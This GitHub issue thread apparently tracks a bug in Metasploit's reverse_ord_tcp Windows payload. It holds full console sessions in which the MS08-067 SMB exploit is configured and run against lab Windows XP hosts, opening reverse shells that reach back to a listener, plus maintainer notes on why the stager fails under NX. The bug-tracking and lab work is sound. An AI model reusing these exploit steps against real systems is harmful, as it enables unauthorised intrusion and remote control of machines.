Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

windows/*/reverse_ord_tcp does not appear to work? #16642

Open
bwatters-r7 opened this issue Jun 2, 2022 · 3 comments
Open

windows/*/reverse_ord_tcp does not appear to work? #16642

bwatters-r7 opened this issue Jun 2, 2022 · 3 comments
Labels
bug confirmed Issues confirmed by a committer payload

Comments

@bwatters-r7
Copy link
Contributor

Based on the documentation here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/windows/shell/reverse_ord_tcp.md
I should be doing this right, but the result is no session, and a crashed smb service:

msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   10.5.132.115     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_ord_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > check

[*] 10.5.132.115:445 - Verifying vulnerable status... (path: 0x0000005a)
[+] 10.5.132.115:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] 10.5.132.115:445 - Automatically detecting the target...
[*] 10.5.132.115:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.5.132.115:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.5.132.115:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.5.132.115
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > check

[-] 10.5.132.115:445 - Connection failed: Rex::ConnectionRefused: The connection was refused by the remote host (10.5.132.115:445).
[*] 10.5.132.115:445 - Cannot reliably check exploitability.

Success if I just use reverse_tcp:

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   10.5.132.115     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] 10.5.132.115:445 - Automatically detecting the target...
[*] 10.5.132.115:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.5.132.115:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.5.132.115:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.5.132.115
[*] Command shell session 4 opened (10.5.135.101:4444 -> 10.5.132.115:1035) at 2022-06-02 16:21:38 -0500


Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----
          

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 A-122D033910404
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          msfuser
Registered Organization:   a
Product ID:                76487-024-5236883-22685
Original Install Date:     8/30/2019, 3:13:29 AM
System Up Time:            N/A
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 85 Stepping 4 GenuineIntel ~3312 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-06:00) Central Time (US & Canada)
Total Physical Memory:     255 MB
Available Physical Memory: 152 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: AMD PCNET Family PCI Ethernet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.5.132.254
                                 IP address(es)
                                 [01]: 10.5.132.115

C:\WINDOWS\system32>

I'm not entirely clear on the use case on this payload type- is it just the size?

msf6 payload(windows/shell/reverse_ord_tcp) > show options

Module options (payload/windows/shell/reverse_ord_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf6 payload(windows/shell/reverse_ord_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 payload(windows/shell/reverse_ord_tcp) > set lport 4567
lport => 4567
msf6 payload(windows/shell/reverse_ord_tcp) > show options

Module options (payload/windows/shell/reverse_ord_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT     4567             yes       The listen port

msf6 payload(windows/shell/reverse_ord_tcp) > generate -f raw -o /dev/null
[*] Writing 93 bytes to /dev/null...
msf6 payload(windows/shell/reverse_ord_tcp) > use payload/windows/shell/reverse_tcp
msf6 payload(windows/shell/reverse_tcp) > set lport 4567
lport => 4567
msf6 payload(windows/shell/reverse_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 payload(windows/shell/reverse_tcp) > generate -f raw -o /dev/null
[*] Writing 296 bytes to /dev/null...
@bwatters-r7 bwatters-r7 added the bug label Jun 2, 2022
@bwatters-r7 bwatters-r7 changed the title windows/*/reverse_rd_tcp does not appear to work? windows/*/reverse_ord_tcp does not appear to work? Jun 2, 2022
@github-actions
Copy link

github-actions bot commented Jul 4, 2022

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Jul 4, 2022
@bcoles
Copy link
Contributor

bcoles commented Jul 9, 2022

[*] 10.5.132.115:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)

That likely isn't going to end well, given that the payload suggests No NX or Win7.

metasploit-framework/modules/payloads/stagers/windows/reverse_ord_tcp.rb

Line 20 in 172ee9a

'Name' => 'Reverse Ordinal TCP Stager (No NX or Win7)',

Although confusingly the documentation later uses a Windows XP SP2 target with AlwaysOn NX:

metasploit-framework/documentation/modules/payload/windows/shell/reverse_ord_tcp.md

Lines 114 to 126 in 172ee9a

The above commands will result into the following scenario, leading a shell
on the target machine:
```
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.3:445 - Automatically detecting the target...
[*] 192.168.56.3:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.56.3:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.56.3:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.56.3
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.3:1034) at 2018-08-17 15:25:02 +0530
```

This payload was designed during the Windows XP SP2 era. Apparently it was a rockin Windows payload in 2005. Perhaps this stopped working in the Windows XP SP3 / Windows 7 era?

I'm not entirely clear on the use case on this payload type- is it just the size?

You can find some details in the slides from "Beyond EIP" (pages 14 to 16) presented at BlackHat Briefings by spoonm and skape in 2005.

These payloads use a technique discussed in Oded Horovitz's lightning talk at CanSecWest/core04. I wasn't able to find details about the lightning talk, but Matt Conover and Oded Horovitz presented "Reliably Exploiting Windows Heap Overflows" at core04, so perhaps the technique was discussed during the presentation. Matt and Oded presented a bunch of heap exploitation related work for Windows 2000 to Windows XP SP2 in 2004/2005.

As you suggest, the primary benefit is the size due to leveraging in-memory WS2_32.dll. Apparently the technique also works on Windows 9x systems. Static addresses are nice too.

@bcoles
Copy link
Contributor

bcoles commented Jul 9, 2022

For what it is worth, this payload failed on Windows XP SP0 for me too.

msf6 > use exploit/windows/smb/ms08_067_netapi 
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
[...]


msf6 exploit(windows/smb/ms08_067_netapi) > set target 2
target => 2
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_ord_tcp 
payload => windows/shell/reverse_ord_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.200.130 
lhost => 192.168.200.130
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.200.212
rhosts => 192.168.200.212
msf6 exploit(windows/smb/ms08_067_netapi) > check
[+] 192.168.200.212:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.212:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.212
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.200.212 - Command shell session 1 closed.


^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > set target 0
target => 0
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.212:445 - Automatically detecting the target...
[*] 192.168.200.212:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] 192.168.200.212:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 192.168.200.212:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.212
[-] Command shell session 2 is not valid and will be closed
[*] 192.168.200.212 - Command shell session 2 closed.

@bcoles bcoles added payload confirmed Issues confirmed by a committer and removed Stale Marks an issue as stale, to be closed if no action is taken labels Jul 9, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug confirmed Issues confirmed by a committer payload
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@bcoles @bwatters-r7